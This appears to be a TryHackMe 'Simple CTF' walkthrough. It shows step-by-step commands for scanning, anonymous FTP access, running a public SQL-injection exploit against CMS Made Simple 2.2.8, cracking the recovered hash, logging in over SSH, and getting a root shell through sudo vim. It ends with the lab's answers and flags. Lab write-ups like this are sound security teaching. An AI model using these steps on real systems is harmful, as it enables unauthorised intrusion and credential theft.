SimpleCTF TryHackMe

performed by: jb-williams

Simple CTF

Deploy the machine and attempt the questions!

Initial Scan

• First we run nmap on the target IP.
• The first scan didn’t give me any info and even suggested adding -Pn to the command:

nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242

• This output will provide the answers for the first two questions.
• In the nmap output I noticed that the ftp service on port 21 allowed anonymous login.

• Login to FTP

ftp -p 10.10.237.242

• And login as user anonymous
• Then run passive to see if the output is:

Passive mode: off; fallback to active mode: off.

• Then running the command ls will show a directory called pub.
• Change into that directory with cd pub and run ls again.
• You will see a file called ForMitch.txt.
• To download all files in the directory including ForMitch.txt run the command mget *, and you can exit back out to your terminal.
• Viewing the contents of ForMitch.txt with cat, you see that the user Mitch has a very simple password that is easy to crack.

• I ran feroxbuster on the target machine while if was going over the nmap output and ftp process.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.237.242/

• The main finds were paths /simple/ and /simple/admin/.
• Traveling to the /simple/ directory we see that the site is using a content management system CMS Made Simple.
• Scanning that page you can see on the bottom left that the version is 2.2.8

• Using searchsploit we can see if there are any known exploits for this version.

searchsploit cms made simple 2.2.8

• The output shows that there is a known exploit CMS Made Simple < 2.2.10 - SQL Injection with the exploit path of php/webapps/46635.py.
• To get the full path and to look at the exploit run:

searchsploit -x 46635.py

• Noticed that it can be ran with -u for url -w for path/to wordlist and --crack to crack the password. So exited the pager.
• After leaving the pager it will show the full path to that exploit.

Path: /usr/share/exploitdb/exploits/php/webapps/46635.py

• I copied that exploit to my working directory and ran it:

python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

• Got an error and opened it up in a text editor.
• I noticed that the script started with #!/usr/bin/env python I changed it to #!/usr/bin/env python3.
• I also noticed that all the print statements were in python2 syntax not python3. And need to change any of the print "<Stuff>" to print ("<Stuff>").
• To do this quickly all at once I closed the text editor and ran this command on 46635.py.

note: this didn’t fully work… one edit needed to be made..shown below

sed -i 's#"."#(&)#g' 46635.py

• Thought I was being clever but it actually double parentheses a print statement for me on line 183, so I changed that line from:

print colored(("<Stuffs>"))

to

print (colored("<Stuffs>"))

• With that done I re-ran:

python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

• The --crack option didn’t work but I did get output: salt for a password, a username, an email, and a hashed password.

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96

• If you run the password hash through hash-identifier, it shows that the hash is likely MD5:

hash-identifier 0c01f4468bd75d7a84c7eb73846e8d96

• We can use hashcat to crack this, put it in passwordhash:salt format.

hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

• The -O is to enalbe optimized kernel
• The -a 0 is the attack mode for MD5
• The -m 10 is for the setup of the hash and salt passwordhash:salt
• After the hash and salt the last bit is the path/to the rockyou.txt wordlist.

• Finding the password for mitch, we attempt to login through ssh port 2222

ssh mitch@10.10.237.242 -p 2222

• After logging in run ls you see user.txt

cat user.txt

• Also, running ls /home lets you see if there are any other users’ home folders.

• After getting the user.txt flag I ran sudo -l to see if there was anyting I could run as sudo with this user, and you can see that they are allowed to use vim without a password.
• Navigating to GTFOBins and search for vim, and you can see a couple commands for breaking out of restricted envirnments. I tried option (a).

sudo vim -c ':!/bin/bash'

• Running whoami you can see you are now root.
• Run a quick ls /root and see root.txt.

cat /root/root.txt

Answers

How many services are running under port 1000?

• Answer: 2

What is running on the hight port?

• Answer: ssh

What’s the CVE you-re using against the application?

• Answer: CVE-2019-9053 (found in the comments of the exploit code)

To what kind of vulnerability is the application vulnerable?

• Answer: sqli

What’s the password?

• Answer: secret

Where can you login with the details obtained?

• Answer: ssh

Whats the user flag?

• Answer: G00d j0b, keep up!

Is there any other user in the home directory? What’s its name?

• Answer: sunbath

What can you leverage to spawn a privileged shell?

• Answer: vim

What’s the root flag?

• Answer: W3ll d0n3. You made it!

written and performed by jb-williams - github